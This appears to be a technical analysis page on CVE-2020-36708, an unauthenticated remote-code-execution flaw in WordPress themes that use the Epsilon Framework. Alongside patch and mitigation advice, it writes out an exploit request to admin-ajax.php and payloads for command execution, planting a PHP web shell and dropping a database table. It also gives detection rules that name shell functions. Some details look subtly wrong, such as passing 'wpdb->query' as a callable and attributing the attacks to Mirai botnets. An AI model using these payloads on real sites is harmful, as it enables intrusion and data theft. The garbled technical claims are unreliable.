CVE-2020-36708
CVE-2020-36708
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- None
- Scope
- Unchanged
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
The following themes for WordPress are vulnerable to Function Injections in versions up to and including Shapely <= 1.2.7, NewsMag <= 2.4.1, Activello <= 1.4.0, Illdy <= 2.1.4, Allegiant <= 1.2.2, Newspaper X <= 1.3.1, Pixova Lite <= 2.0.5, Brilliance <= 1.2.7, MedZone Lite <= 1.2.4, Regina Lite <= 2.0.4, Transcend <= 1.1.8, Affluent <= 1.1.0, Bonkers <= 1.0.4, Antreas <= 1.0.2, Sparkling <= 2.4.8, and NatureMag Lite <= 1.0.4. This is due to epsilon_framework_ajax_action. This makes it possible for unauthenticated attackers to call functions and achieve remote code execution.
Comprehensive Technical Analysis of CVE-2020-36708
WordPress Epsilon Framework Themes – Unauthenticated Function Injection Vulnerability
1. Vulnerability Assessment & Severity Evaluation
CVE ID: CVE-2020-36708
CVSS Score: 9.8 (Critical) – AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vulnerability Type: Unauthenticated Function Injection (Remote Code Execution - RCE)
Root Cause: Improper sanitization and insecure implementation of the epsilon_framework_ajax_action function in multiple WordPress themes, allowing unauthenticated attackers to execute arbitrary PHP functions.
Severity Breakdown:
- Attack Vector (AV:N): Exploitable remotely over the network without authentication.
- Attack Complexity (AC:L): Low – No special conditions required.
- Privileges Required (PR:N): None – Unauthenticated exploitation.
- User Interaction (UI:N): None – No user interaction needed.
- Scope (S:U): Unchanged – Impact confined to the vulnerable component.
- Confidentiality (C:H), Integrity (I:H), Availability (A:H): High impact across all CIA triad components.
Exploitability: High – Publicly available PoC exploits exist, and mass exploitation has been observed in the wild (e.g., Wordfence reported large-scale attacks in November 2020).
2. Potential Attack Vectors & Exploitation Methods
Exploitation Mechanism:
The vulnerability stems from the Epsilon Framework, a theme customization library used by multiple WordPress themes. The epsilon_framework_ajax_action function fails to:
- Validate user-supplied input (e.g.,
actionparameter). - Restrict function calls to a safe allowlist.
- Enforce authentication before processing AJAX requests.
An attacker can craft a malicious HTTP POST request to the WordPress AJAX endpoint (/wp-admin/admin-ajax.php) with:
- A manipulated
actionparameter pointing to an arbitrary PHP function. - Additional parameters to control function arguments.
Exploitation Steps:
-
Reconnaissance:
- Identify vulnerable WordPress sites using affected themes (e.g., via HTTP headers,
wp-content/themes/directory enumeration). - Confirm theme version via
style.cssorreadme.txt.
- Identify vulnerable WordPress sites using affected themes (e.g., via HTTP headers,
-
Exploit Delivery:
- Send a crafted POST request to
/wp-admin/admin-ajax.phpwith:POST /wp-admin/admin-ajax.php HTTP/1.1 Host: vulnerable-site.com Content-Type: application/x-www-form-urlencoded action=epsilon_framework_ajax_action&_action=unauthenticated_function_call&function=system&args[]=id - Example Payloads:
- Command Execution:
function=system&args[]=whoami - File Upload:
function=file_put_contents&args[]=/var/www/html/shell.php&args[]=<?php system($_GET['cmd']); ?> - Database Manipulation:
function=wpdb->query&args[]=DROP TABLE users
- Command Execution:
- Send a crafted POST request to
-
Post-Exploitation:
- Establish persistence (e.g., backdoor installation).
- Escalate privileges (if WordPress runs with elevated permissions).
- Exfiltrate sensitive data (e.g.,
wp-config.php).
Proof-of-Concept (PoC) Availability:
- Publicly disclosed PoCs exist (e.g., NinTechNet).
- Mass scanning and exploitation observed in the wild (e.g., Wordfence reports).
3. Affected Systems & Software Versions
Vulnerable Themes & Versions:
The following WordPress themes are affected up to and including the specified versions:
| Theme Name | Vulnerable Version | Patched Version |
|---|---|---|
| Shapely | ≤ 1.2.7 | 1.2.8+ |
| NewsMag | ≤ 2.4.1 | 2.4.2+ |
| Activello | ≤ 1.4.0 | 1.4.1+ |
| Illdy | ≤ 2.1.4 | 2.1.5+ |
| Allegiant | ≤ 1.2.2 | 1.2.3+ |
| Newspaper X | ≤ 1.3.1 | 1.3.2+ |
| Pixova Lite | ≤ 2.0.5 | 2.0.6+ |
| Brilliance | ≤ 1.2.7 | 1.2.8+ |
| MedZone Lite | ≤ 1.2.4 | 1.2.5+ |
| Regina Lite | ≤ 2.0.4 | 2.0.5+ |
| Transcend | ≤ 1.1.8 | 1.1.9+ |
| Affluent | ≤ 1.1.0 | 1.1.1+ |
| Bonkers | ≤ 1.0.4 | 1.0.5+ |
| Antreas | ≤ 1.0.2 | 1.0.3+ |
| Sparkling | ≤ 2.4.8 | 2.4.9+ |
| NatureMag Lite | ≤ 1.0.4 | 1.0.5+ |
Affected Components:
- Epsilon Framework (common library across all themes).
- WordPress AJAX Handler (
admin-ajax.php).
Environmental Factors:
- WordPress Version: Any (vulnerability is theme-specific).
- PHP Version: No direct dependency, but RCE requires PHP functions like
system(),exec(), orpassthru()to be enabled. - Web Server: Apache/Nginx (no specific server-side requirements).
4. Recommended Mitigation Strategies
Immediate Actions:
-
Patch Management:
- Upgrade all affected themes to the latest patched versions (see table above).
- If no patch is available, disable the theme and switch to an alternative.
-
Workarounds (if patching is delayed):
- Disable AJAX Endpoint for Unauthenticated Users:
Add the following to
functions.php:add_filter('wp_ajax_nopriv_epsilon_framework_ajax_action', '__return_false'); - Restrict Access to
/wp-admin/admin-ajax.php: Use.htaccess(Apache) ornginx.confto block unauthenticated requests:<Files admin-ajax.php> Order Deny,Allow Deny from all Allow from <trusted-IPs> </Files> - Disable Dangerous PHP Functions:
Modify
php.inito disable:disable_functions = system, exec, passthru, shell_exec, proc_open
- Disable AJAX Endpoint for Unauthenticated Users:
Add the following to
-
Monitoring & Detection:
- Log Analysis: Monitor
admin-ajax.phpfor suspiciousaction=epsilon_framework_ajax_actionrequests. - WAF Rules: Deploy ModSecurity rules to block known exploit patterns:
SecRule REQUEST_FILENAME "@streq /wp-admin/admin-ajax.php" \ "chain,id:1000,log,deny,status:403" SecRule ARGS:action "@pm epsilon_framework_ajax_action" \ "t:none,t:lowercase" - File Integrity Monitoring (FIM): Detect unauthorized file modifications (e.g., backdoors in
/wp-content/).
- Log Analysis: Monitor
Long-Term Strategies:
-
Theme & Plugin Hardening:
- Audit Third-Party Themes/Plugins: Use tools like WPScan or Wordfence to identify vulnerable components.
- Principle of Least Privilege: Ensure WordPress runs with minimal filesystem permissions.
-
Security Headers & Hardening:
- Implement CSP (Content Security Policy) to mitigate XSS risks.
- Enable HSTS (HTTP Strict Transport Security).
- Disable PHP execution in upload directories:
<Directory "/var/www/html/wp-content/uploads"> php_flag engine off </Directory>
-
Incident Response Planning:
- Isolate Compromised Systems: If exploitation is detected, take the site offline and perform forensic analysis.
- Reset Credentials: Change all WordPress, database, and server credentials.
- Restore from Backup: Ensure clean backups are available (pre-vulnerability).
5. Impact on the Cybersecurity Landscape
Exploitation Trends:
- Mass Scanning: Threat actors actively scan for vulnerable WordPress sites (e.g., using Shodan, Censys).
- Automated Exploits: Botnets (e.g., Mirai variants, Kinsing) leverage this vulnerability for cryptojacking, SEO spam, and malware distribution.
- Supply Chain Risk: The Epsilon Framework’s widespread use increases the attack surface for WordPress sites globally.
Broader Implications:
-
WordPress Ecosystem Risks:
- Theme/Plugin Vulnerabilities: A recurring issue due to lack of secure coding practices in the WordPress ecosystem.
- Delayed Patching: Many site owners fail to update themes/plugins, leaving sites exposed for months/years.
-
Attacker Motivations:
- Initial Access: Used to gain a foothold in web servers for further exploitation.
- Data Exfiltration: Targets databases containing PII, payment data, or credentials.
- Malware Distribution: Deploy ransomware, backdoors, or cryptominers.
-
Regulatory & Compliance Impact:
- GDPR/CCPA: Unauthorized data access may trigger breach notifications.
- PCI DSS: Compromised sites handling payment data risk non-compliance.
6. Technical Details for Security Professionals
Vulnerability Deep Dive:
Root Cause Analysis:
The epsilon_framework_ajax_action function in the Epsilon Framework processes AJAX requests without:
- Authentication Checks: No
is_user_logged_in()or capability checks. - Input Validation: Directly passes user-supplied
functionandargsparameters tocall_user_func_array(). - Allowlisting: No restriction on which PHP functions can be called.
Vulnerable Code Snippet (Simplified):
add_action('wp_ajax_epsilon_framework_ajax_action', 'epsilon_framework_ajax_action');
add_action('wp_ajax_nopriv_epsilon_framework_ajax_action', 'epsilon_framework_ajax_action');
function epsilon_framework_ajax_action() {
$function = $_POST['function']; // Unsanitized user input
$args = $_POST['args']; // Unsanitized arguments
call_user_func_array($function, $args); // Arbitrary function execution
}
Exploit Chaining:
- Combining with Other Vulnerabilities:
- Local File Inclusion (LFI): Use
file_get_contents()to read sensitive files (e.g.,wp-config.php). - Remote File Inclusion (RFI): Fetch and execute malicious PHP scripts from attacker-controlled servers.
- Privilege Escalation: If WordPress runs as
www-data, attackers may gain root access via kernel exploits.
- Local File Inclusion (LFI): Use
Forensic Indicators:
- Log Entries:
POST /wp-admin/admin-ajax.php HTTP/1.1 action=epsilon_framework_ajax_action&function=system&args[]=whoami - File System Artifacts:
- Unauthorized PHP files in
/wp-content/uploads/or/wp-content/themes/. - Modified
.htaccessorwp-config.php.
- Unauthorized PHP files in
- Network Indicators:
- Outbound connections to C2 servers (e.g.,
hxxp://attacker[.]com/shell.txt).
- Outbound connections to C2 servers (e.g.,
Detection & Hunting:
- SIEM Rules (e.g., Splunk, ELK):
index=wordpress sourcetype=apache:access | search uri="/wp-admin/admin-ajax.php" action="epsilon_framework_ajax_action" | stats count by src_ip, user_agent, function, args | where count > 0 - YARA Rule for Malicious Payloads:
rule WordPress_Epsilon_RCE { meta: description = "Detects CVE-2020-36708 exploitation attempts" reference = "CVE-2020-36708" strings: $ajax = "/wp-admin/admin-ajax.php" $epsilon = "epsilon_framework_ajax_action" $dangerous_funcs = /(system|exec|passthru|shell_exec|proc_open)/ condition: $ajax and $epsilon and $dangerous_funcs }
Conclusion
CVE-2020-36708 represents a critical unauthenticated RCE vulnerability in multiple WordPress themes due to insecure implementation of the Epsilon Framework. Its high CVSS score (9.8) and ease of exploitation make it a prime target for threat actors. Organizations must prioritize patching, implement compensating controls, and monitor for exploitation attempts to mitigate risk.
Key Takeaways for Security Teams:
- Patch immediately – Upgrade all affected themes.
- Monitor AJAX endpoints – Detect and block suspicious requests.
- Harden WordPress – Disable dangerous functions, restrict access, and deploy WAF rules.
- Assume breach – Conduct forensic analysis if exploitation is suspected.
For further details, refer to the Wordfence and NinTechNet advisories linked in the CVE references.